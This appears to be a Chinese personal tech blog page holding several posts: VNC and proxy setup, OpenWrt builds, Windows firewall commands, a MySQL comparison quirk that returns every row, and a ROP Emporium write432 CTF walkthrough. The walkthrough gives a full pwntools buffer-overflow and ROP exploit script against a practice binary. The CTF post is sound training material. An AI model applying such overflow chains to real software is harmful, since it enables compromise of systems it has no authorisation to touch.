Author: AutoPost

bookmark_borderDebian10安装桌面+配置VNC

Posted on by AutoPost

安装

Debian10桌面版本次安装Xfce(https://wiki.debian.org/DesktopEnvironment )
apt update -y && apt full-upgrade -y
sudo apt install tasksel
sudo tasksel
sudo apt install tightvncserver
# https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-vnc-on-debian-10
启动VNC并且生成配置文件:
vncserver :1 -geometry 1280x800 -depth 16 -localhost -nolisten tcp
配置文件默认保存在 ~/.vnc目录下。
然后根据安装的不同的桌面,修改对应的配置。

Gnome桌面配置

安装Gnome组件:
sudo apt install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal -y
写入配置文件,使客户端连接的时候可以启动图形界面,不然有可能是灰屏或者是空的
cp ~/.vnc/xstartup ~/.vnc/xstartup.old

cat > ~/.vnc/xstartup << EOF
#!/bin/bash
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
# gnome-session &
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session &
EOF
最关键的就是这句:
dbus-launch –exit-with-session gnome-session &

xfce桌面配置

修改配置文件
vim  ~/.vnc/xstartup
cp ~/.vnc/xstartup ~/.vnc/xstartup.old

cat > ~/.vnc/xstartup << EOF
#!/bin/bash
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
# gnome-session &
vncconfig -iconic &
dbus-launch --exit-with-session startxfce4 &
EOF

重启VNC Server

vncserver -kill :1
vncserver :1 -geometry 1280x800 -depth 16 -localhost -nolisten tcp
然后通过映射服务器的5901端口就可以访问vnc了,例如:
ssh root@VPS_IP -L 5901:localhost:5901
连接本机5901端口即可。

bookmark_borderROP Emporium学习 — write432

Posted on by AutoPost

write432

静态分析

查看二进制文件的基本信息
xxxx@debian9:~/pwn/ropemporium$ rabin2 -I write432
arch     x86
baddr    0x8048000
binsz    6050
bintype  elf
bits     32
canary   false
class    ELF32
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto   false
endian   little
havecode true
intrp    /lib/ld-linux.so.2
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  Intel 80386
maxopsz  16
minopsz  1
nx       true
os       linux
pcalign  0
pic      false
relocs   true
relro    partial
rpath    .
sanitiz  false
static   false
stripped false
subsys   linux
va       true
[0x080483f0]> afl
0x080483f0    1 50           entry0
0x08048423    1 4            fcn.08048423
0x080483c0    1 6            sym.imp.__libc_start_main
0x0804837c    3 35           sym._init
0x08048440    1 4            sym.__x86.get_pc_thunk.bx
0x080483e0    1 6            sym..plt.got
0x080485b4    1 20           sym._fini
0x08048450    4 50   -> 41   sym.deregister_tm_clones
0x08048490    4 58   -> 54   sym.register_tm_clones
0x080484d0    3 34   -> 31   sym.__do_global_dtors_aux
0x08048500    1 6            entry.init0
0x0804852a    1 25           sym.usefulFunction
0x080483d0    1 6            sym.imp.print_file
0x080485b0    1 2            sym.__libc_csu_fini
0x08048550    4 93           sym.__libc_csu_init
0x08048430    1 2            sym._dl_relocate_static_pie
0x08048506    1 36           main
0x080483b0    1 6            sym.imp.pwnme
[0x080483f0]>
执行一下程序
xxxx@debian9:~/pwn/ropemporium$ ./write432
write4 by ROP Emporium
x86

Go ahead and give me the input already!

> AAA
Thank you!
xxxx@debian9:~/pwn/ropemporium$

动态调试

使用gdb调试
 gdb -q ./write432
查看程序开启了哪些保护
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
gdb-peda$
NX: ENABLED说明Heap里没有执行权限,无法在Heap上构造shellcode执行。
加载程序到main的位置停下
gdb-peda$ start
在read函数处做断点
gdb-peda$ break *read
随便创建30个长度的字符
gdb-peda$ pattern_create 30
'AAA%AAsAABAA$AAnAACAA-AA(AADAA'
继续执行
gdb-peda$ continue
在read函数执行完的地方停下
gdb-peda$ finish
输入AAA%AAsAABAA$AAnAACAA-AA(AADAA
一路next 到ret之前:
gdb-peda$ next
可以看到路上并没有对输入做任何校验。
在 leave;ret;指令之前,可以看到Heap的大小是40
[----------------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0xf7fd2000 --> 0x1f0c
ECX: 0xfbad0087
EDX: 0xf7fb1870 --> 0x0
ESI: 0x1
EDI: 0xf7fb0000 --> 0x1b2db0
EBP: 0xffffd588 --> 0xffffd598 --> 0x0
ESP: 0xffffd560 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA\n")
EIP: 0xf7fd074a (<pwnme+173>:   mov    ebx,DWORD PTR [ebp-0x4])
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7fd0741 <pwnme+164>:      call   0xf7fd0540 <puts@plt>
   0xf7fd0746 <pwnme+169>:      add    esp,0x10
   0xf7fd0749 <pwnme+172>:      nop
=> 0xf7fd074a <pwnme+173>:      mov    ebx,DWORD PTR [ebp-0x4]
   0xf7fd074d <pwnme+176>:      leave
   0xf7fd074e <pwnme+177>:      ret
   0xf7fd074f <print_file>:     push   ebp
   0xf7fd0750 <print_file+1>:   mov    ebp,esp
[------------------------------------stack-------------------------------------]
0000| 0xffffd560 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA\n")
0004| 0xffffd564 ("AAsAABAA$AAnAACAA-AA(AADAA\n")
0008| 0xffffd568 ("ABAA$AAnAACAA-AA(AADAA\n")
0012| 0xffffd56c ("$AAnAACAA-AA(AADAA\n")
0016| 0xffffd570 ("AACAA-AA(AADAA\n")
0020| 0xffffd574 ("A-AA(AADAA\n")
0024| 0xffffd578 ("(AADAA\n")
0028| 0xffffd57c --> 0xa4141 ('AA\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0xf7fd074a in pwnme () from ./libwrite432.so

gdb-peda$ p/d $ebp-$esp
$1 = 40
因此造出大于40个长度的字符即可溢出,由于32位程序要4字节对齐,那就创44个字符。
gdb-peda$ pattern_create 44
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0A'
溢出:
xxxx@debian9:~/pwn/ropemporium$ ./write432
write4 by ROP Emporium
x86

Go ahead and give me the input already!

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0A
Thank you!
Segmentation fault
xxxx@debian9:~/pwn/ropemporium$

利用

确定利用方法
题目的意思上给print_file函数传一个参数(flag.txt)
xxxx@debian9:~/pwn/ropemporium$ radare2  write432
 -- Everybody hates warnings. Mr. Pancake, tear down this -Wall
[0x080483f0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x080483f0]> afl
0x080483f0    1 50           entry0
0x08048423    1 4            fcn.08048423
0x080483c0    1 6            sym.imp.__libc_start_main
0x0804837c    3 35           sym._init
0x08048440    1 4            sym.__x86.get_pc_thunk.bx
0x080483e0    1 6            sym..plt.got
0x080485b4    1 20           sym._fini
0x08048450    4 50   -> 41   sym.deregister_tm_clones
0x08048490    4 58   -> 54   sym.register_tm_clones
0x080484d0    3 34   -> 31   sym.__do_global_dtors_aux
0x08048500    1 6            entry.init0
0x0804852a    1 25           sym.usefulFunction
0x080483d0    1 6            sym.imp.print_file
0x080485b0    1 2            sym.__libc_csu_fini
0x08048550    4 93           sym.__libc_csu_init
0x08048430    1 2            sym._dl_relocate_static_pie
0x08048506    1 36           main
0x080483b0    1 6            sym.imp.pwnme
[0x080483f0]>
整个PE文件都没有flag字符
[0x080483f0]> axt @@ str.*

[0x080483f0]> izz
需要构造然后放到内存中的data区域内。
找写内存的gadget
$ ROPgadget --binary write432 --only 'pop|mov|ret'
Gadgets information
============================================================
...
0x08048543 : mov dword ptr [edi], ebp ; ret
用于把寄存器的值写道内存里 后面只要关注怎么让edi指向.data区域就行了
$ ROPgadget --binary write432 --only 'pop|mov|ret'
Gadgets information
============================================================
...
0x080485aa : pop edi ; pop ebp ; ret
这个指令可以修改edi值地址,使其指向任何可写的内存区域,用于构造“flag.txt”
查找哪个区域可以写:
$ readelf -a ./write432
...
  [19] .init_array       INIT_ARRAY      08049efc 000efc 000004 04  WA  0   0  4
  [20] .fini_array       FINI_ARRAY      08049f00 000f00 000004 04  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049f04 000f04 0000f8 08  WA  6   0  4
  [22] .got              PROGBITS        08049ffc 000ffc 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        0804a000 001000 000018 04  WA  0   0  4
  [24] .data             PROGBITS        0804a018 001018 000008 00  WA  0   0  4
data区域可写,而且里面是空的:
$ readelf -x .data ./write432
Hex dump of section '.data':
  0x0804a018 00000000 00000000                   ........
压入成功后会在.data区域写入 flag.txt 字符
[----------------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0x41414141 ('AAAA')
ECX: 0xfbad0087
EDX: 0xf7fb1870 --> 0x0
ESI: 0x1
EDI: 0x804a01c (".txt")
EBP: 0x7478742e ('.txt')
ESP: 0xffffd5ac --> 0x80483d0 (<print_file@plt>:        jmp    DWORD PTR ds:0x804a014)
EIP: 0x8048545 (<usefulGadgets+2>:      ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048541 <usefulFunction+23>:       leave
   0x8048542 <usefulFunction+24>:       ret
   0x8048543 <usefulGadgets>:   mov    DWORD PTR [edi],ebp
=> 0x8048545 <usefulGadgets+2>: ret
   0x8048546 <usefulGadgets+3>: xchg   ax,ax
   0x8048548 <usefulGadgets+5>: xchg   ax,ax
   0x804854a <usefulGadgets+7>: xchg   ax,ax
   0x804854c <usefulGadgets+9>: xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd5ac --> 0x80483d0 (<print_file@plt>:       jmp    DWORD PTR ds:0x804a014)
0004| 0xffffd5b0 --> 0x804a018 ("flag.txt")
0008| 0xffffd5b4 --> 0xffffd644 --> 0xffffd77d ("/home/xxxx/pwn/ropemporium/write432")
0012| 0xffffd5b8 --> 0xffffd64c --> 0xffffd7a1 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
0016| 0xffffd5bc --> 0x0
0020| 0xffffd5c0 --> 0x0
0024| 0xffffd5c4 --> 0x0
0028| 0xffffd5c8 --> 0xf7fb0000 --> 0x1b2db0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048545 in usefulGadgets ()
gdb-peda$ x/10s 0x0804a018
0x804a018:      "flag.txt"
0x804a021:      ""
0x804a022:      ""
0x804a023:      ""
0x804a024:      ""
0x804a025:      ""
0x804a026:      ""
0x804a027:      ""
0x804a028:      ""
0x804a029:      ""
gdb-peda$ next
由于print_file中是从ebp+0x8 传的参数给fopen, 因此flag.txt之前还要加4个字符
   0xf7fd0772 <print_file+35>:  push   DWORD PTR [ebp+0x8]
=> 0xf7fd0775 <print_file+38>:  call   0xf7fd0570 <fopen@plt>
python3 利用脚本
from pwn import *

def convertASCII_to_Hex(value):
	res = ""
	for i in value:
		res += hex(ord(i))[2:]
	return res      

def changeEndian(value):
	length = len(value)
	res = "0x"
	for i in range(length-1, 0, -2):
		res += value[i-1]+ value[i]
	return res      

def generateString(value):
	return int(changeEndian(convertASCII_to_Hex(value)), 16)


#Prepare the payload
junk = b"A"*44

pop_edi_ebp = p32(0x080485aa)
data_addr_1 = p32(0x0804a018) 
string1 = p32(generateString("flag"))  

move_edi_epb = p32(0x08048543)

pop_edi_ebp = p32(0x080485aa)
data_addr_2 = p32(0x0804a018 + 4) 
string2 = p32(generateString(".txt"))  

print_file = p32(0x080483d0)

payload = junk

payload += pop_edi_ebp
payload += data_addr_1
payload += string1
payload += move_edi_epb

payload += pop_edi_ebp
payload += data_addr_2
payload += string2
payload += move_edi_epb

payload += print_file
payload += b"BBBB"
payload += data_addr_1

#sys.stdout.buffer.write(payload)

# Send the payload
elf = ELF('write432')                 #context.binary
p = process(elf.path)

p.sendline(payload)                 #send the payload to the process

p.interactive()
参考:

bookmark_borderMysql特殊查询技巧

Posted on by AutoPost
今天有个群友在群里提出了类似的疑问:
select * from USER_PRIVILEGES where GRANTEE = char(111)+char(1);
+---------------------------+---------------+--------------------------+--------------+
| GRANTEE                   | TABLE_CATALOG | PRIVILEGE_TYPE           | IS_GRANTABLE |
+---------------------------+---------------+--------------------------+--------------+
| 'mariadb.sys'@'localhost' | def           | USAGE                    | NO           |
| 'mysql'@'localhost'       | def           | SELECT                   | YES          |
| 'mysql'@'localhost'       | def           | INSERT                   | YES          |
| 'mysql'@'localhost'       | def           | UPDATE                   | YES          |
| 'mysql'@'localhost'       | def           | DELETE                   | YES          |
| 'mysql'@'localhost'       | def           | CREATE                   | YES          |
...
 GRANTEE = char(111)+char(1) 可以查出全结果。
思考了一下,发现挺有趣的。记录下来。
char(1)+char(1) 表示0
 select (char(1)+char(1)) from USER_PRIVILEGES;
+-------------------+
| (char(1)+char(1)) |
+-------------------+
|                 0 |
|                 0 |
|                 0 |
GRANTEE=0 表示1
select GRANTEE=0 from USER_PRIVILEGES;
+-----------+
| GRANTEE=0 |
+-----------+
|         1 |
|         1 |
|         1 |
where 1 表示全结果
select count(*) from USER_PRIVILEGES where 1;
+----------+
| count(*) |
+----------+
|       77 |
+----------+
因此就可以用 GRANTEE = char(111)+char(1) 查出全结果了,有点绕。

bookmark_border解决XBOX下载没速度不稳定的问题

Posted on by AutoPost
花了一天时间,终于想明白了,为啥XBOX下载没速度了.
因为XBOX是用UDP下载的,只要流量出了我的路由器到公网,就会被国内运营商Qos.
解决办法,让XBOX的UDP走TCP.
前提:
需要一台国外服务器,需要一个Openwrt(LEDE)软路由
1. 部署xray(xtls+vless)
首先要申请一个域名,然后申请一个SSL证书.
这个一开始会觉得很麻烦,其实熟悉以后,也就十分钟不到的事.
只有域名要花钱,证书都可以免费申请,这个上网找吧.
申请下来域名和证书后,修改如下命令,在服务器上一行一行复制粘贴执行,我这里以Debian为例:
# 证书使用的域名
DOMAIN="xx.xx.xyz"
# 根据 ${DOMAIN}.zip解压出的实际情况 决定 $SSL_CERT 和 $SSL_KEY路径
SSL_CERT="/etc/nginx/ssl/Nginx/1_${DOMAIN}_bundle.crt"
SSL_KEY="/etc/nginx/ssl/Nginx/2_${DOMAIN}.key"
SSL_PORT=11443
HTTP_PORT=10080
XRAY_PORT=1443

sudo apt update -y
sudo apt install nginx-full -y
cd /etc/nginx/ && sudo mkdir ssl
# 把证书压缩包放到/etc/nginx/ssl/下
sudo cp ~/${DOMAIN}.zip /etc/nginx/ssl/
cd /etc/nginx/ssl/ && sudo unzip ${DOMAIN}.zip


sudo tee /etc/nginx/sites-enabled/default << EOF
server {
        listen ${HTTP_PORT} default_server;
		listen [::]:${HTTP_PORT} default_server;
        return 301 https://\$host:${SSL_PORT}\$request_uri;
}
server {

	# SSL configuration
	listen ${SSL_PORT} ssl default_server;
	listen [::]:${SSL_PORT} ssl default_server;
    ssl_certificate ${SSL_CERT};
	ssl_certificate_key ${SSL_KEY};
	
	# Self signed certs generated by the ssl-cert package
	# Don't use them in a production server!
	#
	# include snippets/snakeoil.conf;

	root /var/www/html;

	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;

	server_name ${DOMAIN};

	location / {
        root /var/www/html;
		try_files $uri $uri/ =404;
	}
}
EOF
# 如果要开放 nginx端口需要放开防火墙,不开放也行
#iptables -A INPUT -p tcp --dport ${SSL_PORT} -j ACCEPT

sudo systemctl restart nginx.service 

#xray
#下载最新的Xray-core 到 ~/xtls/xray 目录下
mkdir -p ~/xtls/xray && cd ~/xtls/xray 
lastVersion=$(curl -s https://github.com/XTLS/Xray-core/releases/latest | grep -Po '(?<=/releases/tag/)[0-9a-zA-Z.]*(?=")')
curl -sL "https://github.com/XTLS/Xray-core/releases/download/${lastVersion}/Xray-linux-64.zip" -o Xray-linux-64.zip && unzip  Xray-linux-64.zip
# uuid
Uuid=$(cd  ~/xtls/xray && ./xray uuid)
echo "UUID:$Uuid"

# xray 服务端配置
cat > ~/xtls/xray/config.json << EOF
{
	//日志配置,控制 Xray 输出日志的方式. https://xtls.github.io/Xray-docs-next/config/log.html#logobject
	"log": {
		//"access": "/var/log/Xray/access.log",
		"access": "/tmp/XrayAccess.log",
		"loglevel": "warning",
		"dnsLog": false
	},
	// 提供了一些 API 接口供远程调用。
	//"api": {},
	// 内置的 DNS 服务器. 如果没有配置此项,则使用系统的 DNS 设置。
	"dns": {
		"hosts": {
		  "localhost": "127.0.0.1"
		},
		"servers": [
		  "1.1.1.1",
		  "8.8.8.8",
		  {
			"address": "114.114.114.114",
			"port": 53,
			"domains": ["geoip:cn"]
			#"expectIPs": ["geoip:cn"]
		  },
		  "localhost"
		],
		"clientIp": "1.2.3.4",
		"tag": "dns_inbound"
  },
	// 路由功能。可以设置规则分流数据从不同的 outbound 发出.
	//"routing": {},
	// 本地策略,可以设置不同的用户等级和对应的策略设置。
	//"policy": {},
	// 一个数组,每个元素是一个入站连接配置。
	"inbounds": [ {
		// 监听地址,IP 地址或 Unix domain socket,默认值为 "0.0.0.0",表示接收所有网卡上的连接.可以指定一个系统可用的 IP 地址。支持填写 Unix domain socket,格式为绝对路径,形如 "/dev/shm/domain.socket",可在开头加 @ 代表 abstract,@@ 则代表带 padding 的 abstract。填写 Unix domain socket 时,port 和 allocate 将被忽略,协议目前可选 VLESS、VMess、Trojan,传输方式可选 TCP、WebSocket、HTTP/2、gRPC。
		"listen": "0.0.0.0",
		"port": $XRAY_PORT, // 可以换成其他端口
		"protocol": "vless",
		"settings": {
			"clients": [
				{
					"id": "$Uuid", // 填写你的UUID , ./xray uuid -i "fgrrwd"   OR   ./xray uuid
					"flow": "xtls-rprx-direct", 
					"level": 0
				}
			],
			"decryption": "none",
			"fallbacks": [
				 {
				  "dest": 80  // 本地80端口需支持http2,且不能是https
				}
			]
		},
		"streamSettings": {
			"network": "tcp",
			"security": "xtls",
			"xtlsSettings": {
				//"serverName": "${DOMAIN}",
				//"allowInsecure": false,
				"alpn": ["h2", "http/1.1"],
				//"minVersion": "1.2",
				//"maxVersion": "1.3",
				//"preferServerCipherSuites": true,
				"certificates": [
					{
						"certificateFile": "${SSL_CERT}", // 换成你的证书
						"keyFile": "${SSL_KEY}" // 换成你的私钥
					}
				]
			}
		},
		"sniffing":{
				"enabled": true,
				"destOverride": ["http", "tls", "fakedns"],
				"metadataOnly": false,
				"domainsExcluded": []
			},
		"allocate": {
				//  表示随机开放端口,每隔 refresh 分钟在 port 范围中随机选取 concurrency 个端口来监听。
				"strategy": "always"
			}
        }],
	// 一个数组,每个元素是一个出站连接配置。
	"outbounds": [ {
            "protocol": "freedom"
        }]
	// 用于配置 Xray 其它服务器建立和使用网络连接的方式。
	//"transport": {},
	// 用于配置流量数据的统计。
	//"stats": {},
	// 反向代理。可以把服务器端的流量向客户端转发,即逆向流量转发。
	//"reverse": {},
	// FakeDNS 配置。可配合透明代理使用,以获取实际域名。
	//"fakedns": {}
}
EOF

#  测试配置
./xray -test -config ./config.json
#
# 防火墙把xray端口开开
#iptables -A INPUT -p tcp --dport ${XRAY_PORT} -j ACCEPT
#iptables -A INPUT -p udp --dport ${XRAY_PORT} -j ACCEPT

# 运行
./xray -config ./config.json &


# 客户端配置文件:
cat > ~/xtls/xray/config_client.json << EOF
{
    "log": {
        "loglevel": "warning"
    },
    "inbounds": [
        {
            "port": 1080,
            "listen": "127.0.0.1",
            "protocol": "socks",
            "settings": {
                "udp": true
            }
        }
    ],
    "outbounds": [
        {
            "protocol": "vless",
            "settings": {
                "vnext": [
                    {
                        "address": "${DOMAIN}", 
                        "port": $XRAY_PORT,
                        "users": [
                            {
                                "id": "$Uuid",
                                "flow": "xtls-rprx-direct",
                                "encryption": "none",
                                "level": 0
                            }
                        ]
                    }
                ]
            },
            "streamSettings": {
                "network": "tcp",
                "security": "xtls", 
                "xtlsSettings": {
                    "serverName": "${DOMAIN}"
                }
            }
        }
    ]
}
EOF
把客户端配置文件config_client.json拉到本地
2. openwrt上导入配置
把上述配置输入到openwrt的ShadowSocksR Plus+ 设置中,关于安装ShadowSocksR Plus+ 可以参考我之前的博客.
ShadowSocksR Plus+ 中的”访问控制”->”局域网访问控制”中,内网访问控制选择”仅允许列表内”.
全局代理的LAN IP 和 增强游戏模式客户端LAN IP 分别输入XBOX的IP即可,点保存应用生效.
这时候下载速度就只和你VPS线路的速度有关了.
Windows上可以用v2rayN客户端.

bookmark_borderSuricata无法检测tls加密的https流量

Posted on by AutoPost
尝试了用SSLKEYLOGFILE导出https流量client端的key,并在wireshark中解密,导出pcap,suricata依旧无法检测。
以下是过程:
1. 配置密钥存放地址环境变量
mkdir ~/tls && touch ~/tls/sslkeylog.log

#zsh
echo ""  >> ~/.zshrc
echo "export SSLKEYLOGFILE=~/tls/sslkeylog.log" >> ~/.zshrc && source ~/.zshrc

#bash
echo ""  >> ~/.bashrc
echo "export SSLKEYLOGFILE=~/tls/sslkeylog.log" >> ~/.bashrc && source ~/.bashrc
2. 配置wireshark中 解密密钥的路径
3 curl 一下https网站, wireshark就解密了。

可以看到
使用wireshark是可以看到https中的http明文的。
但是suricata无法检测http中的任何关键字。
到网上找到一个PDF,确信了suricata是无法检测tls加密流量中的明文的:
PDF最后提到要把suricata放到ssl 负载均衡后面。
就是不知道天眼,御界是怎么导入证书检测的,难道用私钥充当了代理服务器解密的角色?

bookmark_borderssh 通过socks5 代理连接

Posted on by AutoPost
在kali上 nc默认用的是nc.traditional,不支持代理的。
$ ll /bin/nc
lrwxrwxrwx 1 root root 20 Jan 11  2019 /bin/nc -> /etc/alternatives/nc
$ ll /etc/alternatives/nc
lrwxrwxrwx 1 root root 15 Jan  1 12:06 /etc/alternatives/nc -> /bin/nc.traditional
安装支持socks5的nc
$ sudo apt install  netcat-openbsd -y
然后就可以使用ssh通过socks5代理连接了:
ssh [email protected] -o ProxyCommand='nc -X 5 -x 192.168.x.x:1080 %h %p' -p 22
或者也可以让ssh通过另一个ssh隧道:
ssh [email protected] -o ProxyCommand='ssh -W %h:%p -oPort=22 -oIdentityFile="~/.ssh/key" 11.22.33.44' -p 22
让连111.222.111.222的ssh 外面裹着 11.22.33.44的ssh隧道。

bookmark_borderopenwrt编译ssr

Posted on by AutoPost

需求

弄了个软路由,openwrt。
CPU : MediaTek MT7621A
是什么 mipsel_24kc 架构的。搞不懂。
刷了几天终于把能上谷歌的插件装上了。
一开始用openclash,结果装上配置太复杂,玩不转。
然后又去找其他的替代软件,发现ShadowSocksR Plus+ 和符合我的需求。简单粗暴。

编译

建议使用Ubuntu18.04,我用的Debian10也可以,CPU > 1 ,内存 >1。我用的4G 2C。全程建议在能上外网的环境下进行。
在LEDE中编译:

# 全程不能用root操作
sudo apt-get update
sudo apt-get -y install build-essential asciidoc binutils bzip2 gawk gettext git libncurses5-dev libz-dev patch python3 python2.7 unzip zlib1g-dev lib32gcc1 libc6-dev-i386 subversion flex uglifyjs git-core gcc-multilib p7zip p7zip-full msmtp libssl-dev texinfo libglib2.0-dev xmlto qemu-utils upx libelf-dev autoconf automake libtool autopoint device-tree-compiler g++-multilib antlr3 gperf wget curl swig rsync

# https://github.com/Lienol/openwrt
# https://github.com/gl-inet/openwrt.git
# https://github.com/coolsnowwolf/lede 看说明
# 二次编译 和 重新配置 查看仓库README
git clone https://github.com/coolsnowwolf/lede
cd  lede/package
git clone https://github.com/kenzok8/openwrt-packages.git
git clone https://github.com/kenzok8/small.git

cd  ../
./scripts/feeds clean && ./scripts/feeds update -a 
./scripts/feeds install -a
# 在弹出的菜单中,通过前三个选择到指定的CPU型号,在LUCI里选择要编译的应用。配置保存为 ".config"文件
make menuconfig

# 下载dl库(国内请尽量全局科学上网)
make -j8 download V=s
# -j1 后面是线程数。第一次编译推荐用单线程
# 如果之前用 proxychains4 ,那这一步不能用 proxychains4 。
make -j1 V=s

make menuconfig 这一步要注意,Luci->Application中luci-app-passwall 的NaiveProxy ,我勾选上会报错,需要取消勾选:

 <M> luci-app-passwall.............................. LuCI support for PassWall
 [ ] Include NaiveProxy

安装

bin目录下会有很多包
直接安装 luci-app-ssr-plus_181-4_all.ipk会报少依赖:

缺啥依赖 就用 find 命令去bin/目录下找,找到拉过去安装,直到完全满足依赖。

luci-app-ssr-plus:

  • shadowsocksr-libev-alt
  • pdnsd-alt
  • microsocks
  • dns2socks
  • shadowsocksr-libev-ssr-local
  • tcping
  • shadowsocks-libev-ss-local
  • shadowsocks-libev-ss-redir
  • simple-obfs
  • shadowsocks-rust-sslocal
  • simple-obfs
  • v2ray-plugin
  • xray-core
  • trojan
  • ipt2socks
  • redsocks2
  • kcptun-client
  • shadowsocksr-libev-server
  • shadowsocksr-libev-alt
  • shadowsocks-libev-ss-local
  • shadowsocks-libev-ss-redir
  • simple-obfs

passwall:

  • shadowsocks-libev-ss-server
  • xray-geodata
  • trojan-plus
  • trojan-go
  • naiveproxy
  • brook
  • chinadns-ng

vssr:

  • lua-maxminddb
  • xray-plugin

还要额外安装 luci-compat

我编译好的:
https://mc.73007300.xyz/files/router/

bookmark_borderWindows防火墙小结

Posted on by AutoPost
 windows防火墙默认只要不加block策略,没开放的就是关闭
可以通过netsh配置如上策略:
netsh advfirewall set currentprofile  blockinbound,allowoutbound
其它一些例子
# 恢复初始防火墙设置
netsh advfirewall reset
# 关闭防火墙
netsh advfirewall set allprofiles state off
# 开启防火墙
netsh advfirewall set allprofile state on 
# 查看状态
netsh advfirewall show allprofiles
# 关闭已有规则
NETSH ADVFIREWALL FIREWALL SET RULE all NEW enable=no

# 直接禁止指定端口 会导致其它没指定的端口放开
# 保证不会关闭业务端口
netsh advfirewall set allprofile state on 
netsh advfirewall firewall add rule dir=in action=block protocol=UDP localport=53 name="Block_UDP-53"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=137 name="Block_TCP-137"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=138 name="Block_TCP-138"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=139 name="Block_TCP-139"
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=3389 name="Block_TCP-3389"


# 3389对指定IP放行 
netsh advfirewall firewall add rule name="Allow baoleiji access 3389" dir=in protocol=TCP action=allow localport=3389  remoteip="10.153.127.110"
netsh advfirewall firewall add rule name="Allow baoleiji access 3389" dir=in protocol=TCP action=allow localport=3389  remoteip="192.168.111.129"

#  删掉指定名称的规则
netsh advfirewall firewall delete rule name="Block_UDP-53"
netsh advfirewall firewall delete rule name="Block_TCP-135"
netsh advfirewall firewall delete rule name="Block_TCP-137"
netsh advfirewall firewall delete rule name="Block_TCP-138"
netsh advfirewall firewall delete rule name="Block_TCP-139"
netsh advfirewall firewall delete rule name="Block_TCP-445"
netsh advfirewall firewall delete rule name="Block_TCP-1245"
netsh advfirewall firewall delete rule name="Block_TCP-1433"
netsh advfirewall firewall delete rule name="Block_TCP-3306"
netsh advfirewall firewall delete rule name="Block_TCP-3389"
#禁用 指定端口上的规则
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=53  protocol=UDP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=135  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=137  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=138  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=139  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=445  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=1245  protocol=TCP NEW enable=no
NETSH ADVFIREWALL FIREWALL SET RULE  name=all dir=in localport=3389  protocol=TCP NEW enable=no

# 只允许堡垒机(10.153.127.110)访问3389
netsh advfirewall firewall add rule name="Allow baoleiji access 3389" dir=in protocol=TCP action=allow localport=3389  remoteip="10.153.127.110"

# 删掉指定端口,指定协议上的规则 不建议使用
netsh advfirewall firewall delete rule name=all dir=in localport=53  protocol=UDP
netsh advfirewall firewall delete rule name=all dir=in localport=135  protocol=TCP
netsh advfirewall firewall delete rule name=all dir=in localport=137  protocol=TCP
netsh advfirewall firewall delete rule name=all dir=in localport=138  protocol=TCP
netsh advfirewall firewall delete rule name=all dir=in localport=139  protocol=TCP
netsh advfirewall firewall delete rule name=all dir=in localport=445  protocol=TCP
netsh advfirewall firewall delete rule name=all dir=in localport=1245  protocol=TCP


# 开启防火墙阻止445并开放其他所有端口
netsh advfirewall set allprofile state on 
netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule name="ALL port" protocol=TCP dir=in localport=1-444 action=allow
netsh advfirewall firewall add rule name="ALL port" protocol=TCP dir=in localport=446-65535 action=allow

